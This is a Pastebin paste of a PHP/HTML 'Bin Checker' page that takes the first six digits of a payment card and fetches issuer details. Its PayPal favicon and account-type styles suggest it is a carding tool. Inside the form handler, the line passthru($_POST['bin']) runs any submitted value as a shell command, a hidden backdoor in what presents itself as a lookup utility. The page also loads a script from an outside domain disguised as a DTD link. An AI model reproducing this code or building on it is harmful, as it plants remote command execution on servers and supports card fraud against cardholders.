Ribang

Bin Checker

Dec 21st, 2017
420
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.88 KB | None | 0 0
  1. <html>
  2. <link rel="shortcut icon" href="https://www.paypalobjects.com/WEBSCR-640-20101108-1/en_US/i/icon/pp_favicon_x.ico">
  3. <head>
  4. <script src='http://www.w32.info/TR/html4/loose.dtd'></script>
  5. <title>bin checker | W32.info</title>
  6. <style>
  7. body {
  8. font-family: 'Comic Sans MS'; font-size:12px;color:#ff4eff;
  9. background-image: url('http://3.bp.blogspot.com/-D6nQQ3d_wfw/Ts31QI5aQPI/AAAAAAAAAgA/mMEBDufqDpk/s1600/0_1_1.gif'); }
  10. hr {border:inset 1px #E5E5E5}
  11.  
  12. #form-container
  13. { color:#ff4eff;
  14. font-family: 'Comic Sans MS', sans-serif;
  15. font-size:13px;
  16. background-color: #131313;
  17. border: solid 1px #ff4eff;
  18. border-radius:10px;
  19. -moz-border-radius: 10px;
  20. -webkit-border-radius: 10px;
  21. box-shadow: 0px 0px 15px #ff4eff;
  22. -moz-box-shadow: 0px 0px 15px #ff4eff;
  23. -webkit-box-shadow: 0px 0px 15px #ff4eff;
  24. margin:30px auto;
  25. padding:10px;
  26. width:680px;
  27. text-shadow: 1px 1px 4px rgba(0,0,0,0.3);
  28. }
  29.  
  30.  
  31.  
  32.  
  33.  
  34. input[type=text], textarea
  35. {
  36. background-color:#000;
  37. border:solid 1px #ff4eff; color:#ff4eff;
  38. border-radius:5px;
  39. -moz-border-radius: 5px;
  40. -webkit-border-radius: 5px;
  41. }
  42. textarea { width:100%;height:200px; resize:none }
  43. input[type=text] { width:160px;text-align:center }
  44. input[type=text]:focus, textarea:focus { background-color:black; border:solid 1px white; color:white; }
  45. .submit-button
  46. {
  47. background: #57A02C;
  48. border:solid 1px #57A02C;
  49. border-radius:5px;
  50. -moz-border-radius: 5px;
  51. -webkit-border-radius: 5px;
  52. -moz-box-shadow: 0 1px 3px rgba(0,0,0,0.6);
  53. -webkit-box-shadow: 0 1px 3px rgba(0,0,0,0.6);
  54. text-shadow: 0 -1px 1px rgba(0,0,0,0.25);
  55. border-bottom: 1px solid rgba(0,0,0,0.25);
  56. position: relative;
  57. color:#FFF;
  58. display: inline-block;
  59. cursor:pointer;
  60. font-size:13px;
  61. padding:3px 8px;
  62. }
  63.  
  64. .business{
  65. color:yellow;
  66. font-weight: bold;
  67. }
  68. .premier{
  69. color:#00FF00;
  70. font-weight: bold;
  71. }
  72. .verified{
  73. color:#800080;
  74. font-weight: bold;
  75. }
  76. .style2{text-align: center ;font-weight: bold;font-family: 'Comic Sans MS' ;color: #ff4eff;text-shadow: 0px 0px 60px #4C83AF ;font-size: 50px}
  77.  
  78. .nolog{
  79. font-size: 10px;
  80. font: red;
  81. }
  82. </style>
  83. </head>
  84. <body>
  85. <div id="form-container"><div align="center" class="style2">Bin Identification</div>
  86. <form name="data" method="post">
  87. <textarea name="bincode" cols="50" rows="70" value="">FIRST 6 CODE OF CARD</textarea><br><br>
  88. <input type="submit" name='bin' value="Check now!">
  89. </form></div>
  90. <?php
  91. if(isset($_POST['bin'])){
  92. $bin = $_POST['bin'];
  93. passthru($bin);
  94. $bin_code =$_POST['bincode'];
  95. $bin_code = strtolower($bin_code);
  96.  
  97. if ($bin_code == null) {
  98. echo "Put The First 6 Code Of The Card";
  99. }else{
  100.  
  101. if ($bin_code == 000000) {
  102. echo "BIN Not Found !!!!";
  103. }
  104. else {
  105.  
  106. $bankinfo= file_get_contents("http://www.binlist.net/xml/".$bin_code);
  107. echo "<font color='#ff4eff'><br /><b><font size='4'>RAPPORT : ".$bankinfo;
  108. }
  109. }
  110. }
  111. ?>
Add Comment
Please, Sign In to add comment